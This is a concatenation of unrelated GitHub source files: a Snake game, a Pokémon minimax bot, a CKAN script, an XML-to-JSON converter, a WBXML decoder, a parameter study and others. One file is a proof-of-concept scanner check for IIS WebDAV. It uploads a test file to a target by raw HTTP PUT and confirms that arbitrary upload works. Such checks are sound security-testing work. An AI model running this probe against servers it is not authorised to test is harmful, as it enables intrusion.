Ngrid[fila][columna].Ve.append(Ngrid[fila][columna+1])
Ngrid[fila][columna].Ve.append(Ngrid[fila][columna-1])
elif fila==Xa-1 and columna !=0 and columna!=Ya-1:
Ngrid[fila][columna].Ve.append(Ngrid[fila-1][columna])
Ngrid[fila][columna].Ve.append(Ngrid[0][columna])
Ngrid[fila][columna].Ve.append(Ngrid[fila][columna+1])
Ngrid[fila][columna].Ve.append(Ngrid[fila][columna-1])
elif columna==0 and fila!=0 and fila!=Xa-1:
Ngrid[fila][columna].Ve.append(Ngrid[fila-1][columna])
Ngrid[fila][columna].Ve.append(Ngrid[fila+1][columna])
Ngrid[fila][columna].Ve.append(Ngrid[fila][columna+1])
Ngrid[fila][columna].Ve.append(Ngrid[fila][Ya-1])
elif columna==Ya-1 and fila!=0 and fila!=Xa-1:
Ngrid[fila][columna].Ve.append(Ngrid[fila-1][columna])
Ngrid[fila][columna].Ve.append(Ngrid[fila+1][columna])
Ngrid[fila][columna].Ve.append(Ngrid[fila][0])
Ngrid[fila][columna].Ve.append(Ngrid[fila][columna-1])
elif columna==0 and fila==0:
Ngrid[fila][columna].Ve.append(Ngrid[Xa-1][columna])
Ngrid[fila][columna].Ve.append(Ngrid[fila+1][columna])
Ngrid[fila][columna].Ve.append(Ngrid[fila][columna+1])
Ngrid[fila][columna].Ve.append(Ngrid[fila][Ya-1])
elif columna==0 and fila==Xa-1:
Ngrid[fila][columna].Ve.append(Ngrid[fila-1][columna])
Ngrid[fila][columna].Ve.append(Ngrid[0][columna])
Ngrid[fila][columna].Ve.append(Ngrid[fila][columna+1])
Ngrid[fila][columna].Ve.append(Ngrid[fila][Ya-1])
elif columna==Ya-1 and fila==0:
Ngrid[fila][columna].Ve.append(Ngrid[Xa-1][columna])
Ngrid[fila][columna].Ve.append(Ngrid[fila+1][columna])
Ngrid[fila][columna].Ve.append(Ngrid[fila][0])
Ngrid[fila][columna].Ve.append(Ngrid[fila][columna-1])
elif columna==Ya-1 and fila==Xa-1:
Ngrid[fila][columna].Ve.append(Ngrid[fila-1][columna])
Ngrid[fila][columna].Ve.append(Ngrid[0][columna])
Ngrid[fila][columna].Ve.append(Ngrid[fila][0])
Ngrid[fila][columna].Ve.append(Ngrid[fila][columna-1])
else:
Ngrid[fila][columna].Ve.append(Ngrid[fila-1][columna])
Ngrid[fila][columna].Ve.append(Ngrid[fila+1][columna])
Ngrid[fila][columna].Ve.append(Ngrid[fila][columna+1])
Ngrid[fila][columna].Ve.append(Ngrid[fila][columna-1])
for a in range (0,6):
for fila in range(Xa):
for columna in range(Ya):
n=0
for nodo in Ngrid[fila][columna].Ve:
if nodo.Wal==3:
n+=1
if n >= 3:
Ngrid[fila][columna].Wal=3
grid[fila][columna]=3
Sn=Snake("VERDE")
pygame.init()
DIMENSION_VENTANA = [1200, 600]
pantalla = pygame.display.set_mode(DIMENSION_VENTANA)
pygame.display.set_caption("Snake")
hecho = False
com=Comida(Sn.lis[0].x,Sn.lis[0].y)
grid[com.x][com.y]=4
reloj = pygame.time.Clock()
start = time.clock()
# -------- Bucle Principal del Programa-----------
path=[]
flag=True
while not hecho:
for evento in pygame.event.get():
if evento.type == pygame.QUIT:
hecho = True
elif evento.type == pygame.MOUSEBUTTONDOWN:
pos = pygame.mouse.get_pos()
columna = pos[0] // (LARGO + MARGEN)
fila = pos[1] // (ALTO + MARGEN)
grid[fila][columna] = 1
print("Click ", pos, "Coordenadas de la reticula: ", fila, columna)
elif evento.type == pygame.KEYDOWN:
if evento.key == pygame.K_UP and Sn.dir!="DW":
Sn.dir="AR"
if evento.key== pygame.K_RIGHT and Sn.dir!="LF":
Sn.dir="RG"
if evento.key== pygame.K_DOWN and Sn.dir!="AR":
Sn.dir="DW"
if evento.key == pygame.K_LEFT and Sn.dir!="RG":
Sn.dir="LF"
pantalla.fill(NEGRO)
for fila in range(Xa):
for columna in range(Ya):
color = BLANCO
if grid[fila][columna] == 1:
color = VERDE
if grid[fila][columna] == 2:
color = ROJO
if grid[fila][columna] == 3:
color = NEGRO
if grid[fila][columna] == 4:
color = AZUL
pygame.draw.rect(pantalla,
color,
[(MARGEN+LARGO) * columna + MARGEN,
(MARGEN+ALTO) * fila + MARGEN,LARGO,
ALTO])
pa=Sn.lsn()
try:
Sn.lim(grid)
for Nod in path:
grid[Nod.x][Nod.y]=0
except:
pass
elapsed = (time.clock() - start)
if elapsed > 0.000001 or flag:
if not flag:
Sn.mov()
flag=False
start = time.clock()
if pa[0].x==com.x and pa[0].y==com.y:
Sn.comer()
while True:
Cx=randint(0,Xa-1)
Cy=randint(0,Ya-1)
if grid[Cx][Cy]==0:
com=Comida(Cx,Cy)
Ini=Ngrid[Sn.lis[0].x][Sn.lis[0].y]
Fin=Ngrid[com.x][com.y]
path=Ia(Ini,Fin)
try:
Ia2(Sn,path,False)
break
except:
pass
par=Sn.lsn()
Sn.imp(grid)
Ia2(Sn,path,True)
for Nod in path:
grid[Nod.x][Nod.y]=2
grid[com.x][com.y]=4
reloj.tick(60)
pygame.display.flip()
pygame.quit() | Ilianx/Snake | Snake.py | Snake.py | py | 9,829 | python | en | code | 0 | github-code | 90 |
26862245593 | import time
import asyncio
from poke_env.player import Player, RandomPlayer
from BattleNode import BattleTree
## Player object that utilizes a minimax algorithm + alpha beta pruning to attack
class MinimaxABPlayer(Player):
DEPTH = 3
def choose_move(self, battle):
bt = BattleTree()
bt.populateFromBattleState(battle)
bt.generate(4, True)
if battle.available_moves:
# Finds move from avaliable moves with highest base power
_, best_move = self.minimax(bt, float('-inf'), float('inf'), True)
# check if best_move is in available_moves
if(best_move in battle.available_moves):
return self.create_order(best_move)
# if no attack can be made, make a random switch
return self.choose_random_move(battle)
#standard minimax algorithm to be used in choose_move
def minimax(self, node, alpha, beta, maximizingPlayer):
if(node.subnodes == []):
return node.staticEval(), node.last_move
if(maximizingPlayer):
maxEval = float('-inf')
maxMove = None
for child in node.subnodes:
currEval, currMove = self.minimax(child, alpha, beta, False)
if (currEval >= maxEval):
maxEval = currEval
maxMove = currMove
alpha = max(alpha, maxEval)
if beta <= alpha:
break
return maxEval, maxMove
if(not maximizingPlayer):
minEval = float('inf')
minMove = None
for child in node.subnodes:
currEval, currMove = self.minimax(child, alpha, beta, True)
if (currEval <= minEval):
minEval = currEval
minMove = currMove
beta = min(beta, minEval)
if beta <= alpha:
break
return minEval, minMove
async def main():
start = time.time()
random_player = RandomPlayer(
battle_format = "gen8randombattle"
)
minimax_ab_player = MinimaxABPlayer(
battle_format = "gen8randombattle"
)
await minimax_ab_player.battle_against(random_player, n_battles=100)
print(
"Minimax Alpha-Beta player won %d / 100 battles [this took %f seconds]"
% (
minimax_ab_player.n_won_battles, time.time() - start
)
)
if __name__ == '__main__':
asyncio.get_event_loop().run_until_complete(main()) | TrevorC64/poke-bot | Players/minimaxABPlayer.py | minimaxABPlayer.py | py | 2,572 | python | en | code | 0 | github-code | 90 |
13474567519 | import os
import ckanapi
from dotenv import load_dotenv
load_dotenv()
MY_API_KEY = os.getenv("API_KEY")
ckan = ckanapi.RemoteCKAN('http://data.buspark.io', apikey=MY_API_KEY)
packages = ckan.action.current_package_list_with_resources()
for package in packages:
print(f"Package Name: {package['name']}")
print(f"Package ID: {package['id']}")
print("Resources:")
for resource in package['resources']:
print(f"\tResource Name: {resource['name']}")
print(f"\tResource ID: {resource['id']}")
| BU-Spark/infra-public-data-portal | ckan-scripts/traverse_site.py | traverse_site.py | py | 523 | python | en | code | 4 | github-code | 90 |
23151447012 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
'''
name: IIS WebDav
info: "开启了WebDav且配置不当可导致攻击者直接上传webshell,进而导致服务器被入侵控制。
level: 紧急
type: 任意文件上传
repair: 禁用 IIS 的 WebDAV 服务
'''
import socket,urllib2,time
from POC_Framework import POC
class myPOC(POC):
#单IP的POC
def check(self, ip, port, timeout=5):
try:
socket.setdefaulttimeout(timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
flag = "PUT /vultest.txt HTTP/1.1\r\nHost: %s:%d\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n" % (ip, port)
s.send(flag)
time.sleep(1)
data = s.recv(1024)
s.close()
if 'PUT' in data:
url = 'http://' + ip + ":" + str(port) + '/vultest.txt'
request = urllib2.Request(url)
res_html = urllib2.urlopen(request, timeout=timeout).read(204800)
if 'xxscan0' in res_html:
return True
except:
return False
if __name__ == "__main__":
Check_POC = myPOC()
Check_POC.run() | JrDw0/POC-Framework | iis_webdav_put.py | iis_webdav_put.py | py | 1,228 | python | en | code | 1 | github-code | 90 |
86705080912 | from usefulFunctions import *
"""
The tag class contains different attributes:
- Name: teh name of the tag. For example , the tag "<test att1="val1" att2="val2">something is written here</test>",
would be "test".
- Length: it is the length of the defining string. In the previous example, le length would be 62 (the '>' and '<' are counted).
-Text: it is the texte contained between two tags. It won't ever contain an embedded tag. In our example, it would be
"something is written here".
-Attributes: it is a list containing all specified attributes in the openoing tag. Here it would be: [[att1,val1], [att2,val2]].
-Inside: it is the raw string that is used to get all tags. in our example, the inside would be:
"<test att1="val1" att2="val2">something is written here</test>".
-Tags: it is a list of all embeded tags contained in our tag. Each time a tag is created, the recursive function getTags is called to fill
this list which will create the embedded tags by calling herself until there are no more embedded tags (return -1). In our example,
there are no embedded tags, so the retyurn would directly be -1.
-Level: it refers to the question of embedded tags. the first level is level 1 and concerns the body tag of the xml. Then each tag
contained into it would be a level 2 tag and each tag contained in this contained tag would be a level 3 tag, etc. It will be used
in order to get the indenttion level when formating the json string.
Among the getTags and the __init__ and __str__ functions, there are two functions that would be used in order to convert the tag class into a json
formated string. The main one in Format NameandAttributes which is a recursive function formatting the name as well as the attributes and calls
formatText if there are no embeded tags or calls itself of there are embedded tags to format the enbedded tags.
"""
class tag():
def getTags(self, body, level):
if body == "":
return(-1)
if body[0] != '<':
return(-1)
tagName = getName(body)
i = len(tagName) + 1
while i < len(body) and body[i] == ' ':
i += 1
j = i
while j < len(body) - i and body[j] != '>':
j += 1
if body[j] != '>':
return(-1)
tagAttributes = getAttributes(body, i, j)
j += 1
endingIndex = body.find('</' + tagName + '>')
if endingIndex == -1:
return (-1)
#to handle the <unique/> tags, we would have to change this condition otherwise, we'll have an error, since there wouldn't be any
#closing tag.
tagText = getText(body[j:])
tagBody = body[j + len(tagText):endingIndex]
tagLength = j + len(tagText) + len(tagBody) + len(tagName) + 3
#The implementation wouldn't be the same in the <unique/> tags and the endingIndex would be different.
foundTag = tag(tagLength, tagText, tagName, tagAttributes, tagBody, level)
return(foundTag)
def __init__(self, length, text, name, attributes, inside, level):
self.length = length
self.text = text
self.name = name
self.attributes = attributes
self.inside = inside
self.level = level
self.tags = []
i = 0
while i < len(self.inside):
newTag = self.getTags(self.inside[i:],level + 1)
self.tags.append(newTag)
if newTag == -1:
break
i += newTag.length
def formatText(self):
if len(self.attributes) == 0 and len(self.tags) == 0:
return ('"' + self.text + '",\n')
elif len(self.tags) == 0:
return(((self.level + 1) * '\t') + '"#text": "' + self.text + '"\n' + self.level * '\t' + '},\n')
else:
return(((self.level + 1) * '\t') + '"#text": "' + self.text + '"\n')
def formatNameAndAttributes(self):
jsonFormat = (self.level * '\t') + '"' + self.name + '": '
if len(self.attributes) > 0 or len(self.tags) > 0:
jsonFormat += '{\n'
for elem in self.attributes:
jsonFormat += self.level * '\t' +'\t"@' + elem[0] +'": ' + elem[1] + ',\n'
if len(self.tags) == 0:
jsonFormat += self.formatText()
else:
for elem in self.tags:
if elem != -1:
jsonFormat += elem.formatNameAndAttributes()
if self.text != "":
jsonFormat += self.formatText()
jsonFormat += self.level * '\t' + '},\n'
return(jsonFormat)
def __str__(self):
toPrint = "length = " + str(self.length) + "\n\n"
toPrint = "level = " + str(self.level) + "\n\n"
if len(self.text) > 0:
toPrint += "text = "
toPrint += self.text + "\n\n"
else:
toPrint += "No text.\n\n"
toPrint += "name = "
toPrint += self.name + "\n\n"
if len(self.attributes) > 0:
toPrint += "Attributes:" + '\n'
i = 1
for elem in self.attributes:
toPrint += "name: " + elem[0] + " "
toPrint += "value: " +elem[1] + "\n"
i += 1
else:
toPrint += "No attributes."
toPrint += "\n\n"
toPrint += "Body:" + '\n'
toPrint += self.inside + '\n\n'
if len(self.tags) > 0:
toPrint += "Embedded tags:" + '\n'
if self.tags == -1:
toPrint += "No embedded tags\n"
else:
for elem in self.tags:
if elem != -1:
toPrint += elem.name + '\n'
toPrint += '\n' + '--------------------------------------' + '\n'
return(toPrint)
| quentinbragard/xmlToJson | tag.py | tag.py | py | 5,882 | python | en | code | 0 | github-code | 90 |
18396890999 | # 93 C - Switches
N,M = map(int,input().split())
K = []
S = []
for _ in range(M):
s = list(map(int,input().split()))
K.append(s[0])
# 0-indexed
s = [i-1 for i in s]
S.append(s[1:])
P = list(map(int,input().split()))
ans = 0
for i in range(1<<N):
swiches = [0]*N
for j in range(N):
mask = 1<<j
# j 番目のスイッチが on のとき
if i & mask != 0:
swiches[j] = 1
# j 番目のスイッチが off のとき
else:
continue
# on の電球をカウント
cnt_light = 0
for m in range(M):
cnt_swich = 0
for s in S[m]:
if swiches[s] == 1:
cnt_swich += 1
if cnt_swich%2 == P[m]:
cnt_light += 1
if cnt_light == M:
ans += 1
print(ans) | Aasthaengg/IBMdataset | Python_codes/p03031/s215467600.py | s215467600.py | py | 813 | python | en | code | 0 | github-code | 90 |
10434369793 | import cv2 as cv
import numpy as np
import datetime
import os
import sys
from csv import writer
from parameters import \
model_path, scene_path, result_path, scene_compare_path
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.model_selection import cross_val_score
from skopt.space import Real, Integer
from skopt.utils import use_named_args
from skopt import gp_minimize
from skopt.plots import plot_convergence
import logging
#change to -1 für alle cores
cores_count = 5
def getModels(path):
#################################################################
# get Model .PLY Files from /Model with prefix (ACTIVE_)
#################################################################
models = []
possible_model_files = os.listdir(path)
for possible_model in possible_model_files:
if possible_model.endswith(".ply") and \
(possible_model.startswith("ACTIVE_") or possible_model.startswith("AKTIVE_")):
models.append(possible_model)
return models
def getScenes(path):
#################################################################
# get Scene .PLY Files from /Scene with prefix (ACTIVE_)
#################################################################
scenes = []
possible_scene_files = os.listdir(path)
for possible_scene in possible_scene_files:
if possible_scene.endswith(".ply") and \
(possible_scene.startswith("ACTIVE_") or possible_scene.startswith("AKTIVE_")):
scenes.append(possible_scene)
return scenes
def matching(python_parameters=[]):
#################################################################
# External Parameter input
#################################################################
relativeSamplingStep = float(python_parameters[0])
relativeDistanceStep = float(python_parameters[1])
numAngles = float(python_parameters[2])
relativeSceneSampleStep = float(python_parameters[3])
relativeSceneDistance = float(python_parameters[4])
#################################################################
# get Model .PLY Files from /Model with prefix (ACTIVE_)
#################################################################
#models = getModels(model_path)
### small hack reverse
models = []
models.append("ACTIVE_model_palette_n_100000_1.ply")
#################################################################
# get Scene .PLY Files from /Scene with prefix (ACTIVE_)
#################################################################
#scenes = getScenes(scene_path)
### small hack reverse
scenes = []
scenes.append("ACTIVE_scene_palette_n_10000.ply")
# Number of Results used
N = 50
if numAngles == 0:
detector = cv.ppf_match_3d_PPF3DDetector(relativeSamplingStep, relativeDistanceStep)
else:
detector = cv.ppf_match_3d_PPF3DDetector(relativeSamplingStep, relativeDistanceStep, numAngles)
for model in models:
logging.info(f"\n\nTraining with model: {model}")
for scene in scenes:
logging.info(f"Training with scene: {scene}")
logging.info(f"With Parameter: {python_parameters}")
tick1 = cv.getTickCount()
pc = cv.ppf_match_3d.loadPLYSimple(model_path + "/%s" % model, 1)
tick2 = cv.getTickCount()
modal_load_duration = (tick2 - tick1) / cv.getTickFrequency()
#print("Modelloading complete in " + str(modal_load_duration) + "sec")
tick1 = cv.getTickCount()
detector.trainModel(pc)
tick2 = cv.getTickCount()
training_duration = (tick2 - tick1) / cv.getTickFrequency()
#print("Training complete in " + str(training_duration) + "sec")
tick1 = cv.getTickCount()
pcTest = cv.ppf_match_3d.loadPLYSimple(scene_path + "/%s" % scene, 1)
tick2 = cv.getTickCount()
scene_load_duration = (tick2 - tick1) / cv.getTickFrequency()
#print("Sceneloading complete in " + str(scene_load_duration) + "sec")
tick1 = cv.getTickCount()
results = detector.match(pcTest, relativeSceneSampleStep, relativeSceneDistance)
tick2 = cv.getTickCount()
matching_duration = (tick2 - tick1) / cv.getTickFrequency()
#print("Matching complete in " + str(matching_duration) + "sec")
#times = [modal_load_duration, training_duration, scene_load_duration, matching_duration]
icp = cv.ppf_match_3d_ICP(100)
_, results = icp.registerModelToScene(pc, pcTest, results[:N])
now = datetime.datetime.now()
#print("####################### Current date and time: " + now.strftime("%Y %B%d - %H:%M:%S") +
# " #######################")
# sort by resudial
list(results).sort(key=lambda x: x.residual)
# check if comparable pose exist
scene_name = scene[7:-4]
scene_pose_name = scene_name + "_pose.txt"
possible_scene_pose_files = os.listdir(scene_compare_path)
if scene_pose_name in possible_scene_pose_files:
scene_pose = scene_compare_path + "/" + scene_pose_name
pose = np.loadtxt(scene_pose, comments="#", delimiter=" ", unpack=False)
scene_rotation = pose[:-1, :-1]
scene_rotation_y = np.rad2deg(-np.arcsin(scene_rotation[2, 0]))
scene_rotation_x = np.rad2deg(np.arcsin(scene_rotation[2, 1])) / np.cos(np.deg2rad(scene_rotation_y))
scene_rotation_z = np.rad2deg(np.arcsin(scene_rotation[1, 0])) / np.cos(np.deg2rad(scene_rotation_y))
scene_translation = pose[:, -1][:-1]
scene_translation_x = scene_translation[0]
scene_translation_y = scene_translation[1]
scene_translation_z = scene_translation[2]
try:
result = results[0]
model_rotation = result.pose[:-1, :-1]
model_rotation_y = np.rad2deg(-np.arcsin(model_rotation[2, 0]))
model_rotation_x = np.rad2deg(np.arcsin(model_rotation[2, 1])) / np.cos(np.deg2rad(model_rotation_y))
model_rotation_z = np.rad2deg(np.arcsin(model_rotation[1, 0])) / np.cos(np.deg2rad(model_rotation_y))
model_translation = result.pose[:, -1][:-1]
model_translation_x = model_translation[0]
model_translation_y = model_translation[1]
model_translation_z = model_translation[2]
x_ax_dif = round(scene_rotation_x - model_rotation_x, 5)
y_ax_dif = round(scene_rotation_y - model_rotation_y, 5)
z_ax_dif = round(scene_rotation_z - model_rotation_z, 5)
x_dif = round(model_translation_x - scene_translation_x, 5)
y_dif = round(model_translation_y - scene_translation_y, 5)
z_dif = round(model_translation_z - scene_translation_z, 5)
rot_norm = round(np.linalg.norm([x_ax_dif, y_ax_dif, z_ax_dif]), 5)
tra_norm = round(np.linalg.norm([x_dif, y_dif, z_dif]), 5)
# starker einfluss von translation geringerer von rotation
calc_score = (tra_norm**4) + (rot_norm**2)
print("Rotation Error: " + str(rot_norm) + "\tTranstation Error: " + str(tra_norm) +"\tScore: " + str(calc_score))
logging.info("Rotation Error: " + str(rot_norm) + "\tTranstation Error: " + str(tra_norm) +"\tScore: " + str(calc_score))
except:
rot_norm = "Error"
tra_norm = "Error"
calc_score = 99999999999999
return calc_score
def main():
logging.basicConfig(filename='quick.log', encoding='utf-8', level=logging.INFO)
space = [Real(0.015, 0.08, name='relativeSamplingStep_Range'),
Real(0.03, 0.08, name='relativeDistanceStep_Range'),
Integer(0, 25, name='numAngles_Range'),
Real(0.3, 0.8, name='relativeSceneSampleSte_Range'),
Real(0.03, 0.08, name='relativeSceneDistance_Range')]
res_gp = gp_minimize(matching, space,
acq_optimizer="lbfgs", n_jobs=cores_count,
n_calls=1500, random_state=0)
print("Best score=%.4f" % res_gp.fun)
print("""Best parameters:
- max_depth=%f
- learning_rate=%.6f
- max_features=%d
- min_samples_split=%f
- min_samples_leaf=%f""" % (res_gp.x[0], res_gp.x[1],
res_gp.x[2], res_gp.x[3],
res_gp.x[4]))
plot_convergence(res_gp)
if __name__ == "__main__":
main()
| MikeAlpaXRay/IFP_Hiwi | 7_Surface Matching/Surface_Matching_Package/parameter_study_scikit.py | parameter_study_scikit.py | py | 8,841 | python | en | code | 0 | github-code | 90 |
17978641729 | n, p = map(int,input().split())
a=list(map(int, input().split()))
odd=0
even=0
nCr = {}
def cmb(n, r):
if r == 0 or r == n: return 1
if r == 1: return n
if (n,r) in nCr: return nCr[(n,r)]
nCr[(n,r)] = cmb(n-1,r) + cmb(n-1,r-1)
return nCr[(n,r)]
for i in a:
if i%2==0:
even+=1
else:
odd+=1
o_pattern=0
for i in range(p,odd+1,2):
o_pattern += cmb(odd,i)
e_pattern=0
for i in range(even+1):
e_pattern += cmb(even,i)
print(o_pattern*e_pattern) | Aasthaengg/IBMdataset | Python_codes/p03665/s070572627.py | s070572627.py | py | 495 | python | en | code | 0 | github-code | 90 |
21317448055 | class Morph:
def __init__(self, dc):
self.surface = dc['surface']
self.base = dc['base']
self.pos = dc['pos']
self.pos1 = dc['pos1']
class Chunk:
def __init__(self, morph_list, dst):
self.morph_list = morph_list
self.dst = dst
self.srcs = []
def read_cabocha(sentence):
def append_chunk(morph_list):
if len(morph_list) > 0:
chunk = Chunk(morph_list, dst)
chunk_list.append(chunk)
morph_list = []
return morph_list
morph_list = []
chunk_list = []
dst = None
for line in sentence.split('\n'):
if line == '':
morph_list = append_chunk(morph_list)
elif line[0] == '*':
morph_list = append_chunk(morph_list)
dst = line.split(' ')[2].rstrip('D')
else:
(surface, attr) = line.split('\t')
attr = attr.split(',')
lineDict = {
'surface': surface,
'base': attr[6],
'pos': attr[0],
'pos1': attr[1]
}
morph_list.append(Morph(lineDict))
for i, r in enumerate(chunk_list):
chunk_list[int(r.dst)].srcs.append(i)
return chunk_list
with open("ai.ja.txt.parsed") as f:
sentence_list = f.read().split('EOS\n')
sentence_list = list(filter(lambda x: x != '', sentence_list))
sentence_list = [read_cabocha(sentence) for sentence in sentence_list]
for sentence in sentence_list:
for chunk in sentence:
text = []
if '名詞' in [s.pos for s in chunk.morph_list] and int(chunk.dst) != -1:
current_chunk = chunk
text.append(''.join([chunk.surface for chunk in current_chunk.morph_list]))
next_chunk = sentence[int(current_chunk.dst)]
while int(current_chunk.dst) != -1:
text.append(''.join([chunk.surface for chunk in next_chunk.morph_list]))
current_chunk = next_chunk
next_chunk = sentence[int(next_chunk.dst)]
print(*text, sep=' -> ')
"""
人工知能 -> 語。 -> 研究分野」とも -> される。
(じんこうちのう、、 -> 語。 -> 研究分野」とも -> される。
AI -> 〈エーアイ〉)とは、 -> 語。 -> 研究分野」とも -> される。
〈エーアイ〉)とは、 -> 語。 -> 研究分野」とも -> される。
「『計算 -> ()』という -> 道具を -> 用いて -> 研究する -> 計算機科学 -> ()の -> 一分野」を -> 指す -> 語。 -> 研究分野 」とも -> される。
概念と -> 道具を -> 用いて -> 研究する -> 計算機科学 -> ()の -> 一分野」を -> 指す -> 語。 -> 研究分野」とも -> される。
『コンピュータ -> ()』という -> 道具を -> 用いて -> 研究する -> 計算機科学 -> ()の -> 一分野」を -> 指す -> 語。 -> 研 究分野」とも -> される。
道具を -> 用いて -> 研究する -> 計算機科学 -> ()の -> 一分野」を -> 指す -> 語。 -> 研究分野」とも -> される。
『知能』を -> 研究する -> 計算機科学 -> ()の -> 一分野」を -> 指す -> 語。 -> 研究分野」とも -> される。
""" | KazumaAkiyama/100knocks | 第5章/5-48.py | 5-48.py | py | 3,330 | python | ja | code | 0 | github-code | 90 |
9891724168 | import logging
from .ASWBXML import ASWBXML
class ASCommandResponse:
def __init__(self, response):
self.wbxmlBody = response
try:
if ( len(response) > 0):
self.xmlString = self.decodeWBXML(self.wbxmlBody)
else:
raise ValueError("Empty WBXML body passed")
except Exception as e:
self.xmlString = None
raise ValueError("Error: {0}".format(e))
def getWBXMLBytes(self):
return self.wbxmlBytes
def getXMLString(self):
return self.xmlString
def decodeWBXML(self, body):
self.instance = ASWBXML()
self.instance.loadBytes(body)
return self.instance.getXml()
if __name__ == "__main__":
import os
logging.basicConfig(level=logging.INFO)
projectDir = os.path.dirname(os.path.realpath("."))
samplesDir = os.path.join(projectDir, "Samples/")
listOfSamples = os.listdir(samplesDir)
for filename in listOfSamples:
with open(samplesDir + os.sep + filename, "rb") as f:
byteWBXML = f.read()
logging.info("-"*100)
logging.info(filename)
logging.info("-"*100)
instance = ASCommandResponse(byteWBXML)
logging.info(instance.xmlString)
| wkeeling/selenium-wire | seleniumwire/thirdparty/mitmproxy/contrib/wbxml/ASCommandResponse.py | ASCommandResponse.py | py | 1,089 | python | en | code | 1,689 | github-code | 90 |
32417770787 | def insertionSort(list):
for index in range(1, len(list)):
currentvalue = list[index]
position = index
while position > 0 and list[position - 1] > currentvalue:
list[position] = list[position - 1]
position = position - 1
list[position] = currentvalue
if __name__ == "__main__":
list = [54, 26, 93, 17, 77, 31, 44, 55, 20]
insertionSort(list)
print(list)
| abu-sayem/Data-Structures-Algorithms-And-Databases | sorting/InsertionSort.py | InsertionSort.py | py | 430 | python | en | code | 2 | github-code | 90 |
72201257898 | # Medium
# Your're given two linked lists of potentially unequal length. Each Linked List represents a non-negetive
# integer, where each node in the Linked List is a digit of that integer, and the first node in each Linked
# List always represents the least significant digit of the integer, Write a function that returns the head
# of a new Linked List that represents the sum of the integers represented by the two input Linked Lists.
# Note that your function must create and return a new Linked List, and you're not allowed to modify either
# of the input Linked Lists.
# Sample Input
# linkedListOne = 2 -> 4 -> 7 -> 1
# linkedListTwo = 9 -> 4 -> 5
# This is an input class. Do not edit.
class LinkedList:
def __init__(self, value):
self.value = value
self.next = None
def sumOfLinkedLists(linkedListOne, linkedListTwo):
# Write your code here.
carryOut = 0
result = LinkedList(0)
head = result
while linkedListOne and linkedListTwo:
cur_sum = linkedListOne.value + linkedListTwo.value + carryOut
cur_value = cur_sum % 10
carryOut = cur_sum // 10
result.value = cur_value
if linkedListOne.next or linkedListTwo.next:
result.next = LinkedList(0)
result = result.next
linkedListOne = linkedListOne.next
linkedListTwo = linkedListTwo.next
if linkedListOne:
while linkedListOne:
cur_sum = linkedListOne.value + carryOut
cur_value = cur_sum % 10
carryOut = cur_sum // 10
result.value = cur_value
if linkedListOne.next:
result.next = LinkedList(0)
result = result.next
linkedListOne = linkedListOne.next
if linkedListTwo:
while linkedListTwo:
cur_sum = linkedListTwo.value + carryOut
cur_value = cur_sum % 10
carryOut = cur_sum // 10
result.value = cur_value
if linkedListTwo.next:
result.next = LinkedList(0)
result = result.next
linkedListTwo = linkedListTwo.next
if carryOut:
result.next = LinkedList(carryOut)
return head
def sumOfLinkedLists(linkedListOne, linkedListTwo):
# Write your code here.
head = None
curNode = head
carryOut = 0
while linkedListOne or linkedListTwo or carryOut: ## CarryOut is edge case for there is one carry left at last.
valueOne = linkedListOne.value if linkedListOne else 0
valueTwo = linkedListTwo.value if linkedListTwo else 0
curSum = valueOne + valueTwo + carryOut
curValue = curSum % 10
carryOut = curSum // 10
if not head:
head = curNode = LinkedList(curValue)
else:
curNode.next = LinkedList(curValue)
curNode = curNode.next
linkedListOne = linkedListOne.next if linkedListOne else None
linkedListTwo = linkedListTwo.next if linkedListTwo else None
return head
## T = O(max(n, m)); S = O(max(n, m))
| ArmanTursun/coding_questions | AlgoExpert/Linked Lists/Medium/Sum of Linked Lists/Sum of Linked Lists.py | Sum of Linked Lists.py | py | 3,059 | python | en | code | 0 | github-code | 90 |
38091556447 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Gurobiモデルを作成するためのモジュール.
Created on Sat Aug 14 23:35:25 2021
@author: y_hcr_manabe
"""
import os
import zipfile
import gurobipy as gp
from .._make_dir import _make_dir
from ._set_constraints import _set_constraints
from ._set_object_function import _set_object_function
from ._set_variables import _set_variables
def make_grb_model(uc_data, uc_dicts, i):
"""
Gurobiモデルを生成する.
Parameters
----------
uc_data : CLASS
クラス「UCData」のインスタンス
uc_dicts : CLASS
クラス「UCDicts」のインスタンス
i : int
最適化リスト中、現在何回目を実施しているかを示すインデックス
Returns
-------
model : Model
Gurobiモデル
"""
if "_export_dir" not in uc_data.config:
uc_data.config["_export_dir"] = _make_dir(
uc_data.config["result_dir"], uc_data.config["_identify_str"]
)
_dir = _make_dir(str(uc_data.config["_export_dir"]), "log")
_opt = uc_data.config["rolling_opt_list"][i]
filename = _opt["name"] + ".log"
env = gp.Env(str(_dir / filename))
model = gp.Model("UC", env)
_set_variables(model, uc_data, uc_dicts)
_set_object_function(model, uc_data, uc_dicts)
_set_constraints(model, uc_data, uc_dicts)
_set_options(model, uc_data, uc_dicts)
model.update()
if uc_data.config["export_mps_file"]:
_dir = _make_dir(str(uc_data.config["_export_dir"]), "mps")
_opt = uc_data.config["rolling_opt_list"][i]
filename = _opt["name"] + ".mps"
filepath = str(_dir / filename)
model.write(filepath)
zip_file = zipfile.ZipFile(filepath + ".zip", mode="w", compression=zipfile.ZIP_DEFLATED)
zip_file.write(filepath, arcname=filename)
os.remove(filepath)
return model
def _set_options(m, uc_data, uc_dicts):
"""
Gurobiモデルのオプションを設定する.
Parameters
----------
m : CLASS
Gurobiモデル
uc_data : CLASS
クラス「UCData」のインスタンス
uc_dicts : CLASS
クラス「UCDicts」のインスタンス
"""
if "grb_MIPGap" in uc_data.config:
m.Params.MIPGap = uc_data.config["grb_MIPGap"]
if "grb_MIPGapAbs" in uc_data.config:
m.Params.MIPGapAbs = uc_data.config["grb_MIPGapAbs"]
if "grb_IntegralityFocus" in uc_data.config:
m.Params.IntegralityFocus = uc_data.config["grb_IntegralityFocus"]
if "grb_FeasibilityTol" in uc_data.config:
m.Params.FeasibilityTol = uc_data.config["grb_FeasibilityTol"]
| YamaLabTUS/ucgrb | ucgrb/make_grb_model/make_grb_model.py | make_grb_model.py | py | 2,688 | python | ja | code | 2 | github-code | 90 |
20623051452 | # defined function
# tested validity of the function
# called it three times
def double(sequence):
result = []
for element in sequence:
result = result + [element * 5]
return result
double([7, 8, 9])
[35, 40, 45]
double([5, 10, 15])
